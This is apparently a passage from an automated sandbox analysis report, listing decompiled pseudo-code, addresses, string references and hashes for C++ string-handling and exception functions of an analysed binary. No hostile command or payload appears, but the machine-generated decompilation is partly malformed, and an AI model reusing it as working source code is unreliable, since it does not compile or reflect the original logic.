					_t148 = _a8;
					if((_t88 | 0xffffffff) - _t161 <= _t148) {
						0xe48b37("string too long");
						asm("int3");
						_t227 = _t233;
						_push(_t148);
						_push(__ecx);
						_push(_t190);
						_t191 = _v16;
						_t213 = _t161;
						_t162 = _v12;
						_t91 =  *(_t191 + 0x10);
						if(_t91 < _t162) {
							0xe48b65("invalid string position");
							goto L35;
						} else {
							_t129 = _t91 - _t162;
							_t162 =  *(_t213 + 0x10);
							_v0 = _t162;
							_t148 =  <  ? _t129 : _a8;
							_t91 = (_t129 | 0xffffffff) - _t162;
							if(_t91 <= _t148) {
								L35:
								0xe48b37("string too long");
								asm("int3");
								_push(_t227);
								_t228 = _t233;
								_push(_t213);
								_t214 = _t162;
								_push(_t191);
								_t192 = _v40;
								_t163 =  *(_t214 + 0x10);
								if((_t91 | 0xffffffff) - _t163 <= _t192) {
									0xe48b37("string too long");
									asm("int3");
									_push(_t228);
									_t229 = _t233;
									_push(_t214);
									_push(_t192);
									_t193 = _v56;
									_t215 = _t163;
									_t94 = E00CA703E(_t163, _t193);
									if(_t94 == 0) {
										_t164 =  *(_t215 + 0x10);
										_push(_t148);
										_t149 = _v4;
										if((_t94 | 0xffffffff) - _t164 <= _t149) {
											0xe48b37("string too long");
											asm("int3");
											_push(_t229);
											_t230 = _t233;
											_push(_t215);
											_push(_t193);
											_t194 = _v76;
											_t216 = _t164;
											if(_t194 == 0xffffffff) {
												0xe48b37("string too long");
												asm("int3");
												_push(_t230);
												_t231 = _t233;
												_t97 = _v88;
												_push(_t149);
												_t150 = _v92;
												_push(_t216);
												_push(_t194);
												_t217 = _t164;
												_t66 = _t150 + 0x10; // 0x8b00172f
												_t195 =  *_t66;
												if(_t195 < _t97) {
													0xe48b65("invalid string position");
													asm("int3");
													_push(_t231);
													_push(_t217);
													_push(_t195);
													_t196 = _v112;
													_t218 = _t164;
													if(E00CA703E(_t164, _t196) == 0) {
														_push(_t150);
														_t151 = _v16;
														if(E00CA6E31(_t218, _t218, _t151, 0) != 0) {
															if( *((intOrPtr*)(_t218 + 0x14)) < 8) {
																_t101 = _t218;
															} else {
																_t101 =  *_t218;
															}
															E00CA78CC(_t101, _t196, _t151);
															 *(_t218 + 0x10) = _t151;
															if( *((intOrPtr*)(_t218 + 0x14)) < 8) {
																_t103 = _t218;
															} else {
																_t103 =  *_t218;
															}
															 *((short*)(_t103 + _t151 * 2)) = 0;
														}
														_t100 = _t218;
													} else {
														if( *((intOrPtr*)(_t218 + 0x14)) < 8) {
															_t100 = _t218;
														} else {
															_t100 =  *_t218;
														}
														_push(_v16);
														_push(_t196 - _t100 >> 1);
														_push(_t218);
														L72();
													}
													return _t100;
												} else {
													_t201 =  <  ? _v8 : _t195 - _t97;
													if(_t217 != _t150) {
														if(E00CA6E31(_t164, _t217, _t201, 0) != 0) {
															if( *((intOrPtr*)(_t150 + 0x14)) >= 8) {
																_t150 =  *_t150;
															}
															if( *((intOrPtr*)(_t217 + 0x14)) < 8) {
																_t168 = _t217;
															} else {
																_t168 =  *_t217;
															}
															E00CA78CC(_t168, _t150 + _v12 * 2, _t201);
															 *(_t217 + 0x10) = _t201;
															if( *((intOrPtr*)(_t217 + 0x14)) < 8) {
																_t109 = _t217;
															} else {
																_t109 =  *_t217;
															}
															 *((short*)(_t109 + _t201 * 2)) = 0;
														}
													} else {
														_push(_t97 + _t201);
														E00CA8331(_t150, _t164, _t201);
														E00CA8364(_t150, _t217, _t201, 0, _v12);
													}
													return _t217;
												}
											} else {
												_push(0);
												if(E00CA2338(_t164, _t194) != 0) {
													E00CA277F(_t216, 0, _t194, _v8);
													 *((intOrPtr*)(_t216 + 0x10)) = _t194;
													if( *((intOrPtr*)(_t216 + 0x14)) < 0x10) {
														_t117 = _t216;
													} else {
														_t117 =  *_t216;
													}
													 *((char*)(_t117 + _t194)) = 0;
												}
												return _t216;
											}
										} else {
											if(_t149 != 0) {
												_v4 = _t164 + _t149;
												if(E00CA6E31(_t215, _t215, _t164 + _t149, 0) != 0) {
													if( *((intOrPtr*)(_t215 + 0x14)) < 8) {
														_t173 = _t215;
													} else {
														_t173 =  *_t215;
													}
													E00CA78CC(_t173 +  *(_t215 + 0x10) * 2, _t193, _t149);
													_t174 = _v4;
													 *(_t215 + 0x10) = _t174;
													if( *((intOrPtr*)(_t215 + 0x14)) < 8) {
														_t124 = _t215;
													} else {
														_t124 =  *_t215;
													}
													 *((short*)(_t124 + _t174 * 2)) = 0;
												}
											}
											_t118 = _t215;
											goto L62;
										}
									} else {
										if( *((intOrPtr*)(_t215 + 0x14)) < 8) {
											_t118 = _t215;
										} else {
											_t118 =  *_t215;
										}
										_push(_v4);
										_push(_t193 - _t118 >> 1);
										_push(_t215);
										L20();
										L62:
										return _t118;
									}
								} else {
									if(_t192 != 0) {
										_push(_t148);
										_t155 = _t163 + _t192;
										if(E00CA6E31(_t214, _t214, _t155, 0) != 0) {
											E00CA69BD(_t214,  *(_t214 + 0x10), _t192, _v0);
											 *(_t214 + 0x10) = _t155;
											if( *((intOrPtr*)(_t214 + 0x14)) < 8) {
												_t128 = _t214;
											} else {
												_t128 =  *_t214;
											}
											 *((short*)(_t128 + _t155 * 2)) = 0;
										}
									}
									return _t214;
								}
							} else {
								if(_t148 != 0 && E00CA6E31(_t213, _t213, _t162 + _t148, 0) != 0) {
									if( *((intOrPtr*)(_t191 + 0x14)) >= 8) {
										_t191 =  *_t191;
									}
									if( *((intOrPtr*)(_t213 + 0x14)) < 8) {
										_t180 = _t213;
									} else {
										_t180 =  *_t213;
									}
									E00CA78CC(_t180 +  *(_t213 + 0x10) * 2, _t191 + _a4 * 2, _t148);
									_t182 = _v0 + _t148;
									 *(_t213 + 0x10) = _t182;
									if( *((intOrPtr*)(_t213 + 0x14)) < 8) {
										_t139 = _t213;
									} else {
										_t139 =  *_t213;
									}
									 *((short*)(_t139 + _t182 * 2)) = 0;
								}
								return _t213;
							}
						}
					} else {
						if(_t148 != 0) {
							_push(0);
							_a8 = _t161 + _t148;
							if(E00CA2338(__ecx, _t161 + _t148) != 0) {
								if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
									_t184 = __ecx;
								} else {
									_t184 =  *__ecx;
								}
								if(_t148 != 0) {
									0xe219a0( *((intOrPtr*)(_t212 + 0x10)) + _t184, _t190, _t148);
								}
								_t185 = _a8;
								 *((intOrPtr*)(_t212 + 0x10)) = _t185;
								if( *((intOrPtr*)(_t212 + 0x14)) < 0x10) {
									_t143 = _t212;
								} else {
									_t143 =  *_t212;
								}
								 *((char*)(_t143 + _t185)) = 0;
							}
						}
						_t140 = _t212;
						goto L18;
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
						_t146 = __ecx;
					} else {
						_t146 =  *__ecx;
					}
					_push(_a8);
					_t140 = E00CA7305(_t147, _t212, _t190 - _t146, _t212, _t190 - _t146);
					L18:
					return _t140;
				}
			}

0x00ca73e5
0x00ca73ea
0x00ca73ed
0x00ca73f0
0x00ca73f7
0x00ca7415
0x00ca741b
0x00ca741c
0x00ca7423
0x00ca7481
0x00ca7486
0x00ca7488
0x00ca748a
0x00ca748b
0x00ca748c
0x00ca748d
0x00ca7490
0x00ca7492
0x00ca7495
0x00ca749a
0x00ca751d
0x00000000
0x00ca749c
0x00ca749f
0x00ca74a1
0x00ca74a6
0x00ca74a9
0x00ca74af
0x00ca74b3
0x00ca7522
0x00ca7527
0x00ca752c
0x00ca752d
0x00ca752e
0x00ca7530
0x00ca7531
0x00ca7536
0x00ca7537
0x00ca753a
0x00ca7541
0x00ca758a
0x00ca758f
0x00ca7590
0x00ca7591
0x00ca7593
0x00ca7594
0x00ca7595
0x00ca7598
0x00ca759b
0x00ca75a2
0x00ca75c2
0x00ca75c8
0x00ca75c9
0x00ca75d0
0x00ca762d
0x00ca7632
0x00ca7633
0x00ca7634
0x00ca7636
0x00ca7637
0x00ca7638
0x00ca763b
0x00ca7640
0x00ca767b
0x00ca7680
0x00ca7681
0x00ca7682
0x00ca7684
0x00ca7687
0x00ca7688
0x00ca768b
0x00ca768c
0x00ca768d
0x00ca768f
0x00ca768f
0x00ca7694
0x00ca770e
0x00ca7713
0x00ca7714
0x00ca7717
0x00ca7718
0x00ca7719
0x00ca771c
0x00ca7726
0x00ca7746
0x00ca7747
0x00ca7756
0x00ca775c
0x00ca7762
0x00ca775e
0x00ca775e
0x00ca775e
0x00ca7767
0x00ca776f
0x00ca7776
0x00ca777c
0x00ca7778
0x00ca7778
0x00ca7778
0x00ca7780
0x00ca7780
0x00ca7784
0x00ca7728
0x00ca772c
0x00ca7732
0x00ca772e
0x00ca772e
0x00ca772e
0x00ca7734
0x00ca773d
0x00ca773e
0x00ca773f
0x00ca773f
0x00ca778a
0x00ca7696
0x00ca769b
0x00ca76a1
0x00ca76c4
0x00ca76ca
0x00ca76cc
0x00ca76cc
0x00ca76d2
0x00ca76d8
0x00ca76d4
0x00ca76d4
0x00ca76d4
0x00ca76e3
0x00ca76eb
0x00ca76f2
0x00ca76f8
0x00ca76f4
0x00ca76f4
0x00ca76f4
0x00ca76fc
0x00ca76fc
0x00ca76a3
0x00ca76a5
0x00ca76a6
0x00ca76b3
0x00ca76b3
0x00ca7706
0x00ca7706
0x00ca7642
0x00ca7642
0x00ca764c
0x00ca7656
0x00ca765f
0x00ca7662
0x00ca7668
0x00ca7664
0x00ca7664
0x00ca7664
0x00ca766a
0x00ca766a
0x00ca7673
0x00ca7673
0x00ca75d2
0x00ca75d4
0x00ca75de
0x00ca75e8
0x00ca75ee
0x00ca75f4
0x00ca75f0
0x00ca75f0
0x00ca75f0
0x00ca75ff
0x00ca7604
0x00ca760e
0x00ca7611
0x00ca7617
0x00ca7613
0x00ca7613
0x00ca7613
0x00ca761b
0x00ca761b
0x00ca75e8
0x00ca761f
0x00000000
0x00ca7621
0x00ca75a4
0x00ca75a8
0x00ca75ae
0x00ca75aa
0x00ca75aa
0x00ca75aa
0x00ca75b0
0x00ca75b9
0x00ca75ba
0x00ca75bb
0x00ca7622
0x00ca7625
0x00ca7625
0x00ca7543
0x00ca7545
0x00ca7547
0x00ca7548
0x00ca7557
0x00ca7562
0x00ca756b
0x00ca756e
0x00ca7574
0x00ca7570
0x00ca7570
0x00ca7570
0x00ca7578
0x00ca7578
0x00ca757c
0x00ca7582
0x00ca7582
0x00ca74b5
0x00ca74b7
0x00ca74ce
0x00ca74d0
0x00ca74d0
0x00ca74d6
0x00ca74dc
0x00ca74d8
0x00ca74d8
0x00ca74d8
0x00ca74ed
0x00ca74f8
0x00ca74fe
0x00ca7501
0x00ca7507
0x00ca7503
0x00ca7503
0x00ca7503
0x00ca750b
0x00ca750b
0x00ca7515
0x00ca7515
0x00ca74b3
0x00ca7425
0x00ca7427
0x00ca742e
0x00ca7431
0x00ca743b
0x00ca7441
0x00ca7447
0x00ca7443
0x00ca7443
0x00ca7443
0x00ca744b
0x00ca7455
0x00ca745a
0x00ca7461
0x00ca7464
0x00ca7467
0x00ca746d
0x00ca7469
0x00ca7469
0x00ca7469
0x00ca746f
0x00ca746f
0x00ca743b
0x00ca7473
0x00000000
0x00ca7475
0x00ca73f9
0x00ca73fd
0x00ca7403
0x00ca73ff
0x00ca73ff
0x00ca73ff
0x00ca7405
0x00ca740e
0x00ca7476
0x00ca7479
0x00ca7479

APIs

_memmove.LIBCMT ref: 00CA7455
std::_Xinvalid_argument.LIBCPMT ref: 00CA7481

Strings

string too long, xrefs: 00CA747C, 00CA7522

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 4a209ae67b9029738687e64b5c3ecdc90076af6db37adb7a87fa3c105d60834d
Instruction ID: 8165768a8fb0a5add1a82b6a0a4a7e31c3725d2cb554d9efd92cb39e2c7ee242
Opcode Fuzzy Hash: 4a209ae67b9029738687e64b5c3ecdc90076af6db37adb7a87fa3c105d60834d
Instruction Fuzzy Hash: 3C11D6313083529BDB349E699C44D56BFB9FB4B764B000A2DF8A587241C774E905DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00CA7590(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				intOrPtr _t49;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t55;
				intOrPtr* _t61;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t76;
				intOrPtr* _t77;
				signed int _t79;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t86;
				intOrPtr* _t90;
				intOrPtr* _t95;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				signed int _t108;
				intOrPtr* _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				void* _t124;
				void* _t125;
				void* _t127;

				_t100 = _a4;
				_t115 = __ecx;
				_t46 = E00CA703E(__ecx, _t100);
				if(_t46 == 0) {
					_t86 =  *((intOrPtr*)(__ecx + 0x10));
					_t79 = _a8;
					if((_t46 | 0xffffffff) - _t86 <= _t79) {
						0xe48b37("string too long");
						asm("int3");
						_t124 = _t127;
						_push(__ecx);
						_push(_t100);
						_t101 = _v16;
						_t116 = _t86;
						if(_t101 == 0xffffffff) {
							0xe48b37("string too long");
							asm("int3");
							_push(_t124);
							_t125 = _t127;
							_t49 = _v28;
							_push(_t79);
							_t80 = _v32;
							_push(_t116);
							_push(_t101);
							_t117 = _t86;
							_t24 = _t80 + 0x10; // 0x8b00172f
							_t102 =  *_t24;
							if(_t102 < _t49) {
								0xe48b65("invalid string position");
								asm("int3");
								_push(_t125);
								_push(_t117);
								_push(_t102);
								_t103 = _v52;
								_t118 = _t86;
								if(E00CA703E(_t86, _t103) == 0) {
									_push(_t80);
									_t81 = _v4;
									if(E00CA6E31(_t118, _t118, _t81, 0) != 0) {
										if( *((intOrPtr*)(_t118 + 0x14)) < 8) {
											_t53 = _t118;
										} else {
											_t53 =  *_t118;
										}
										E00CA78CC(_t53, _t103, _t81);
										 *(_t118 + 0x10) = _t81;
										if( *((intOrPtr*)(_t118 + 0x14)) < 8) {
											_t55 = _t118;
										} else {
											_t55 =  *_t118;
										}
										 *((short*)(_t55 + _t81 * 2)) = 0;
									}
									_t52 = _t118;
								} else {
									if( *((intOrPtr*)(_t118 + 0x14)) < 8) {
										_t52 = _t118;
									} else {
										_t52 =  *_t118;
									}
									_push(_v4);
									_push(_t103 - _t52 >> 1);
									_push(_t118);
									L26();
								}
								return _t52;
							} else {
								_t108 =  <  ? _a4 : _t102 - _t49;
								if(_t117 != _t80) {
									if(E00CA6E31(_t86, _t117, _t108, 0) != 0) {
										if( *((intOrPtr*)(_t80 + 0x14)) >= 8) {
											_t80 =  *_t80;
										}
										if( *((intOrPtr*)(_t117 + 0x14)) < 8) {
											_t90 = _t117;
										} else {
											_t90 =  *_t117;
										}
										E00CA78CC(_t90, _t80 + _v0 * 2, _t108);
										 *(_t117 + 0x10) = _t108;
										if( *((intOrPtr*)(_t117 + 0x14)) < 8) {
											_t61 = _t117;
										} else {
											_t61 =  *_t117;
										}
										 *((short*)(_t61 + _t108 * 2)) = 0;
									}
								} else {
									_push(_t49 + _t108);
									E00CA8331(_t80, _t86, _t108);
									E00CA8364(_t80, _t117, _t108, 0, _v0);
								}
								return _t117;
							}
						} else {
							_push(0);
							if(E00CA2338(_t86, _t101) != 0) {
								E00CA277F(_t116, 0, _t101, _a4);
								 *((intOrPtr*)(_t116 + 0x10)) = _t101;
								if( *((intOrPtr*)(_t116 + 0x14)) < 0x10) {
									_t69 = _t116;
								} else {
									_t69 =  *_t116;
								}
								 *((char*)(_t69 + _t101)) = 0;
							}
							return _t116;
						}
					} else {
						if(_t79 != 0) {
							_a8 = _t86 + _t79;
							if(E00CA6E31(__ecx, __ecx, _t86 + _t79, 0) != 0) {
								if( *((intOrPtr*)(__ecx + 0x14)) < 8) {
									_t95 = __ecx;
								} else {
									_t95 =  *__ecx;
								}
								E00CA78CC(_t95 +  *(_t115 + 0x10) * 2, _t100, _t79);
								_t96 = _a8;
								 *(_t115 + 0x10) = _t96;
								if( *((intOrPtr*)(_t115 + 0x14)) < 8) {
									_t76 = _t115;
								} else {
									_t76 =  *_t115;
								}
								 *((short*)(_t76 + _t96 * 2)) = 0;
							}
						}
						_t70 = _t115;
						goto L16;
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x14)) < 8) {
						_t77 = __ecx;
					} else {
						_t77 =  *__ecx;
					}
					_push(_a8);
					_t70 = L00CA7487(_t115, _t115, _t100 - _t77 >> 1);
					L16:
					return _t70;
				}
			}

0x00ca7595
0x00ca7598
0x00ca759b
0x00ca75a2
0x00ca75c2
0x00ca75c9
0x00ca75d0
0x00ca762d
0x00ca7632
0x00ca7634
0x00ca7636
0x00ca7637
0x00ca7638
0x00ca763b
0x00ca7640
0x00ca767b
0x00ca7680
0x00ca7681
0x00ca7682
0x00ca7684
0x00ca7687
0x00ca7688
0x00ca768b
0x00ca768c
0x00ca768d
0x00ca768f
0x00ca768f
0x00ca7694
0x00ca770e
0x00ca7713
0x00ca7714
0x00ca7717
0x00ca7718
0x00ca7719
0x00ca771c
0x00ca7726
0x00ca7746
0x00ca7747
0x00ca7756
0x00ca775c
0x00ca7762
0x00ca775e
0x00ca775e
0x00ca775e
0x00ca7767
0x00ca776f
0x00ca7776
0x00ca777c
0x00ca7778
0x00ca7778
0x00ca7778
0x00ca7780
0x00ca7780
0x00ca7784
0x00ca7728
0x00ca772c
0x00ca7732
0x00ca772e
0x00ca772e
0x00ca772e
0x00ca7734
0x00ca773d
0x00ca773e
0x00ca773f
0x00ca773f
0x00ca778a
0x00ca7696
0x00ca769b
0x00ca76a1
0x00ca76c4
0x00ca76ca
0x00ca76cc
0x00ca76cc
0x00ca76d2
0x00ca76d8
0x00ca76d4
0x00ca76d4
0x00ca76d4
0x00ca76e3
0x00ca76eb
0x00ca76f2
0x00ca76f8
0x00ca76f4
0x00ca76f4
0x00ca76f4
0x00ca76fc
0x00ca76fc
0x00ca76a3
0x00ca76a5
0x00ca76a6
0x00ca76b3
0x00ca76b3
0x00ca7706
0x00ca7706
0x00ca7642
0x00ca7642
0x00ca764c
0x00ca7656
0x00ca765f
0x00ca7662
0x00ca7668
0x00ca7664
0x00ca7664
0x00ca7664
0x00ca766a
0x00ca766a
0x00ca7673
0x00ca7673
0x00ca75d2
0x00ca75d4
0x00ca75de
0x00ca75e8
0x00ca75ee
0x00ca75f4
0x00ca75f0
0x00ca75f0
0x00ca75f0
0x00ca75ff
0x00ca7604
0x00ca760e
0x00ca7611
0x00ca7617
0x00ca7613
0x00ca7613
0x00ca7613
0x00ca761b
0x00ca761b
0x00ca75e8
0x00ca761f
0x00000000
0x00ca7621
0x00ca75a4
0x00ca75a8
0x00ca75ae
0x00ca75aa
0x00ca75aa
0x00ca75aa
0x00ca75b0
0x00ca75bb
0x00ca7622
0x00ca7625
0x00ca7625

Strings

invalid string position, xrefs: 00CA7518
string too long, xrefs: 00CA7522, 00CA7585, 00CA7628

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID:
String ID: invalid string position$string too long
API String ID: 0-4289949731
Opcode ID: daae8d7fdf8156783834a376ada44157f837c64a4d9207d8376bcaf1b944f254
Instruction ID: d41460aa3b992976dd00e2d9984726a589ddbd84a29c5c6e41919a4c2f612bf6
Opcode Fuzzy Hash: daae8d7fdf8156783834a376ada44157f837c64a4d9207d8376bcaf1b944f254
Instruction Fuzzy Hash: 6811D331704B469BCB30DF6DCC4899A77A9FF827587004B2DF45587241DB30E909C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3FB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00CA3FB4(intOrPtr __ecx) {
				intOrPtr _t39;
				void* _t41;

				0xe214d0(0x14);
				_t39 = __ecx;
				 *((intOrPtr*)(_t41 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t41 - 0x10)) =  *((intOrPtr*)(_t41 + 8));
				0xe4bb11(0);
				 *((intOrPtr*)(__ecx)) = 0xe932f0;
				 *((intOrPtr*)(__ecx + 4)) = 0xe933b4;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(_t41 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((char*)(_t41 - 4)) = 2;
				0xe4c41d( *((intOrPtr*)(_t41 + 0x10)));
				_t36 = E00CA3110();
				 *((char*)(_t41 - 4)) = 3;
				0xe4ddd2(E00CA2FD4(_t36), "Log2Base", _t41 + 0xc,  *(_t27 + 8) & 0x000000ff, _t41 - 0x20, "DecodingLookupArray", _t41 - 0x10, 1);
				 *((char*)(_t41 - 4)) = 2;
				E00CA4C1B(_t41 - 0x1c);
				0xe2149e();
				return _t39;
			}

0x00ca3fbb
0x00ca3fc0
0x00ca3fcb
0x00ca3fce
0x00ca3fd1
0x00ca3fd6
0x00ca3fdc
0x00ca3fe3
0x00ca3fe6
0x00ca3fe9
0x00ca3fec
0x00ca3fef
0x00ca3ff2
0x00ca3ff5
0x00ca3ff8
0x00ca3ffb
0x00ca4001
0x00ca4005
0x00ca4021
0x00ca402b
0x00ca403d
0x00ca4045
0x00ca4049
0x00ca4050
0x00ca4055

APIs

__EH_prolog3.LIBCMT ref: 00CA3FBB

Part of subcall function 00CA3110: __EH_prolog3.LIBCMT ref: 00CA3117

Part of subcall function 00CA2FD4: __EH_prolog3.LIBCMT ref: 00CA2FDB

Part of subcall function 00E4DDD2: __EH_prolog3_GS.LIBCMT ref: 00E4DDD9

Strings

DecodingLookupArray, xrefs: 00CA4013
Log2Base, xrefs: 00CA4030

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$H_prolog3_
String ID: DecodingLookupArray$Log2Base
API String ID: 4240126716-3088352070
Opcode ID: c119eec4c4fe62f4a0091127fa25dc025310c51cb86e0bf7b5c239ed2220c402
Instruction ID: 3dc50a81c3df813615d63c2cfcad4b5c7448842a9bac2b4579179ab5272f034c
Opcode Fuzzy Hash: c119eec4c4fe62f4a0091127fa25dc025310c51cb86e0bf7b5c239ed2220c402
Instruction Fuzzy Hash: FA1142B090125AAECB01DFA9C9826ADFBF8BF58304F54515EE41CE7642D7749610CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E4C6B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4C6BB

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4C73C

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4C6E6

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 4213c1e36e5ca1944ab5c3338f862687ff798c5359d76ea6631d6352bb01f815
Instruction ID: 22878b61b9f6b4431ec5bd21f28508b62cdf964bff87353e9219ff94e2887bf0
Opcode Fuzzy Hash: 4213c1e36e5ca1944ab5c3338f862687ff798c5359d76ea6631d6352bb01f815
Instruction Fuzzy Hash: 8F018475940318BBDF10EBA4D846FCEBBBCAF25309F104185F905B3241CA749B889761

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DBE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4DBF3

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4DC74

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4DC1E

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 167931f954fd859e946fb997d022dfce60eb2ab98bcc92a0081537067030f36a
Instruction ID: 8407085a9156a56927be878e14c146695f813ec1e980aa419ff971c5de069a58
Opcode Fuzzy Hash: 167931f954fd859e946fb997d022dfce60eb2ab98bcc92a0081537067030f36a
Instruction Fuzzy Hash: 12014875940318BADF10EBA4DC45FCEBBBCAF65315F104185F905B7241CA749A88D761

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DB51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

